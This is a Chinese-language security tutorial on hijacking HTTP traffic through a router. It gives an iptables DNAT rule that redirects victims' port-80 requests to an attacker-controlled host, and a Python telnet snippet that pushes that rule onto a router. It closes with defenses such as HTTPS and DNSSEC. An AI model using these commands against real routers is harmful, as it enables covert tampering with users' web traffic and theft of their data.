前言

HTTP劫持（HTTP hijacking）是一种恶意攻击方式，攻击者利用中间人的方式劫持HTTP通信过程，获取用户敏感信息，或者篡改服务器返回的数据，让用户误以为是合法的服务器返回的结果。

路由器是一种网络设备，用于将本地网络和互联网连接起来，它也可以被攻击者用来进行HTTP劫持攻击。路由器在网络中的位置往往是比较靠前的，攻击者可以通过路由器对所有流经路由器的HTTP通信进行劫持和篡改。

本文将讲述攻击者如何通过路由器篡改了用户访问的网页，从而对用户进行攻击。这种攻击方式非常隐蔽，用户往往很难察觉到自己的网络流量被劫持。

一、HTTP劫持原理介绍

1. 假设攻击者已经通过技术手段进入路由器的telnet 或者ssh终端。

1. 在路由器中实现HTTP劫持通常使用iptables工具进行设置，具体操作是通过添加一条PREROUTING规则，将目标IP地址和端口号重定向到指定的IP地址和端口号。当用户访问目标IP地址和端口号时，数据包将被路由器捕获并转发至指定的IP地址和端口号，从而实现对页面内容的篡改。

1. 下面的命令可以将主机A对目标主机B的80端口的访问，重定向到攻击者主机C的8080端口：

iptables -t nat -A PREROUTING -p tcp -d IP_B --dport 80 -j DNAT --to-destination IP_C:8080

代码解释如下：

当主机A发送HTTP请求到目标主机B的80端口时，数据包首先会被iptables的PREROUTING链捕获，根据规则匹配到DNAT规则，将目标IP地址和端口号改为攻击者主机C的IP地址和8080端口，然后再将修改后的数据包转发到攻击者主机C上，达到HTTP劫持的目的。

1. python版本的核心http劫持代码如下，完整的python代码详见本文末尾，具体代码用法为

python hijackhttp.py -u www.example.com -d xxx.xxx.xxx.xxx

代码执行完毕后，路由器将转发用户所有访问www.example.com的流量到ip xxx.xxx.xxx.xxx。

# 建立 telnet 连接
tn = telnetlib.Telnet('192.168.0.1', port=23)
tn.set_debuglevel(1)# 发送命令
tn.write(b'iptables -t nat -A PREROUTING -p tcp -d xxx.xxx.xxx.xxx --dport 80 -j DNAT --to-destination  xx.xx.xx.x:80\n')

二、HTTP防劫持方法

以下是一些防止HTTP劫持的方法：

• HTTPS协议：使用HTTPS协议可以有效地防止HTTP劫持攻击。HTTPS协议使用SSL或TLS加密传输数据，确保数据在传输过程中不被篡改。因此，HTTP劫持攻击者无法获取数据或篡改数据。

• DNS防污染：DNS污染是一种常见的HTTP劫持攻击方法。通过在DNS服务器上篡改域名解析记录，攻击者可以将用户重定向到恶意站点。为了防止DNS污染攻击，可以使用DNSSEC或使用受信任的DNS服务器。

• 网络流量过滤：可以使用网络防火墙或流量过滤设备来检测和拦截HTTP劫持攻击。这些设备可以检测到流量中的异常，例如大量重定向，未经授权的转发等。

• 使用加密代理：可以使用代理服务器来防止HTTP劫持攻击。代理服务器可以检测并阻止传入的HTTP请求中的恶意代码，并保护用户计算机不受攻击。代理服务器可以使用加密传输数据，以确保传输过程中的数据安全。

• 安全软件：可以安装反病毒软件或反间谍软件来保护计算机不受HTTP劫持攻击。这些软件可以检测和清除计算机中的恶意软件和间谍软件，并阻止HTTP劫持攻击。

• 请注意，这些方法并不能完全防止HTTP劫持攻击，攻击者仍然可能找到一些漏洞来绕过这些保护机制。因此，建议在使用互联网时保持警惕，不要轻信来路不明的链接或下载附件。

三、运行代码及测试环境

本文使用环境及工具配置

• telnet 连接路由器：telnet 192.168.0.1 23

• 执行 iptables 命令进行重定向：iptables -t nat -A PREROUTING -p tcp -d xx.xx.xx.xx --dport 80 -j DNAT --to-destinationxx.xx.xx.xx:80

• 检查 iptables 规则是否生效：iptables -t nat -L -n

• 恢复原来的 iptables 规则：iptables -t nat -D PREROUTING 1

• 检查 iptables 规则是否已经恢复：iptables -t nat -L -n

希望这个总结能对您有所帮助。

本文所测试用到的相关源码及测试环境:

Web-PenTest/README.md at main · MasterTaiBai/Web-PenTest · GitHub

成为一名合格的Web安全专业人员需要长时间的学习和实践。只有通过持续的努力，掌握Web安全知识和技能，才能真正成为一个专业的白帽子。

在此祝愿安全爱好者及从业人员都能够取得成功，实现自己的梦想，为网络安全贡献自己的力量！